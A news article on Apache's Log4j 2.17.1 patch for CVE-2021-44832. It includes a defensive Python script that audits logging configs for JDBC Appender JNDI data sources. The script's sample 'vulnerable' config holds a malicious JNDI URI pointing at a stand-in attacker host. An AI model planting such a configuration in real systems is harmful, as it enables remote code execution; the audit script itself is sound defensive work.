UPDATED 19:51 EST / DECEMBER 28 2021

SECURITY

Apache releases Log4j patch to address new RCE vulnerability

The Apache Software Foundation has released a new patch for Log4j, the Java-based logging utility that has seen vulnerabilities targeted en masse by hackers since Dec. 13.

Log4j 2.17.1, the fifth update this month, addresses a new remote code execution vulnerability found in 2.17.0. CVE-2021-44832 allows an attacker who already has permission to modify the logging configuration file to construct a malicious configuration, using a JDBC Appender whose data source references a JNDI URI, that results in remote code execution. The vulnerability affects Log4j versions 2.0-beta7 through 2.17.0, excluding the security fix releases 2.3.2 and 2.12.4.

The new vulnerability has been fixed by limiting JNDI data source names to the Java protocol in Log4j version 2.17.1, along with backported fixes for the older release lines: 2.12.4 for Java 7 and 2.3.2 for Java 6.
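Because exploitation depends on the contents of the logging configuration, a practical check while rolling out the patch is to audit existing log4j2.xml files for a JDBC Appender whose DataSource points at a non-java: JNDI name. The script below is an added example written for this article, not code from Apache Log4j; it mirrors the 2.17.1 rule (scheme-less or java: names pass, any other scheme is rejected) as a stand-alone config scan. Both sample configurations and the host name in them are constructed for illustration.

```python
"""Audit Log4j 2 XML configurations for the JDBC Appender / JNDI data-source
pattern behind CVE-2021-44832.

Added example, not code from the article or from Apache Log4j. The sample
configs are constructed; the only rule applied is the one 2.17.1 enforces:
a JNDI data source name must be scheme-less or use the java: protocol."""
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed sample: a JDBC appender whose DataSource is an LDAP JNDI URI.
# This is the configuration shape that CVE-2021-44832 abuses on 2.0-beta7..2.17.0.
VULNERABLE_CONFIG = """<Configuration status="WARN">
  <Appenders>
    <JDBC name="db" tableName="logs">
      <DataSource jndiName="ldap://attacker.example:1389/o=ref" />
      <Column name="message" pattern="%m" />
    </JDBC>
  </Appenders>
  <Loggers><Root level="info"><AppenderRef ref="db"/></Root></Loggers>
</Configuration>"""

# Constructed sample: the same appender bound to a container-local java: name,
# which is the only kind of JNDI data source 2.17.1 will resolve.
SAFE_CONFIG = """<Configuration status="WARN">
  <Appenders>
    <JDBC name="db" tableName="logs">
      <DataSource jndiName="java:comp/env/jdbc/LoggingDataSource" />
      <Column name="message" pattern="%m" />
    </JDBC>
  </Appenders>
  <Loggers><Root level="info"><AppenderRef ref="db"/></Root></Loggers>
</Configuration>"""


def jndi_name_allowed(jndi_name: str) -> bool:
    """Return True if the name has no scheme or the java: scheme.

    Any other scheme (ldap, ldaps, rmi, dns, iiop, ...) is what the
    2.17.1 fix refuses to look up."""
    scheme = urlsplit(jndi_name).scheme.lower()
    return scheme in ("", "java")


def audit_config(config_xml: str):
    """Return (appender_name, jndi_name, allowed) for every DataSource element
    under a JDBC appender. Log4j matches plugin element and attribute names
    case-insensitively, so the comparison is lower-cased on both sides."""
    root = ET.fromstring(config_xml)
    findings = []
    for appender in root.iter():
        if appender.tag.lower() != "jdbc":
            continue
        for child in appender:
            if child.tag.lower() != "datasource":
                continue
            jndi_name = next(
                (v for k, v in child.attrib.items() if k.lower() == "jndiname"), ""
            )
            findings.append(
                (appender.get("name", "?"), jndi_name, jndi_name_allowed(jndi_name))
            )
    return findings


def unsafe_data_sources(config_xml: str):
    """Only the findings a defender needs to act on: non-java: JNDI names."""
    return [(name, jndi) for name, jndi, ok in audit_config(config_xml) if not ok]


if __name__ == "__main__":
    for label, cfg in (("vulnerable", VULNERABLE_CONFIG), ("safe", SAFE_CONFIG)):
        print(label, unsafe_data_sources(cfg))
```

Only the DataSource connection source of the JDBC Appender goes through JNDI; DriverManager and ConnectionFactory sources do not, so the scan ignores them. Run it over every Log4j configuration an application can load, including ones outside the application's own tree that a deployer may have pointed to with log4j2.configurationFile.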

The vulnerability has a Common Vulnerability Scoring System score of 6.6, well below the 10.0 of the original Log4Shell flaw, because exploitation requires write access to the logging configuration rather than merely the ability to get a string logged. As researchers at Snyk Ltd. noted today, it's not as bad as it sounds, although they added that those running Log4j should still apply the new patches.

“The Log4j CVE being released today requires a fairly obscure set of conditions to trigger,” Casey Ellis, founder and chief technology officer at crowdsourced security company Bugcrowd Inc., told SiliconANGLE. “So, while it’s important for people to keep an eye out for newly released CVEs for situational awareness, this CVE doesn’t appear to increase the already elevated risk of compromise via Log4j.”

Ellis explained that the vulnerability appears to have been discovered through the use of static code analysis tools in conjunction with manual review/exploit development. “As a logging library, Log4j is inherently flexible in terms of how data can be passed to it — each of these points of interaction is a potential vector for exploitation,” Ellis noted. “Many eyes are currently scouring Log4j, so it’s fairly safe to expect more of this type of vulnerability announcement over the coming weeks. In the interest of staying as up-to-date as possible with Log4j — especially if the configurations required for exploiting CVE-2021-44832 — patching to 2.17.1 is a good idea.”

Image: Apache
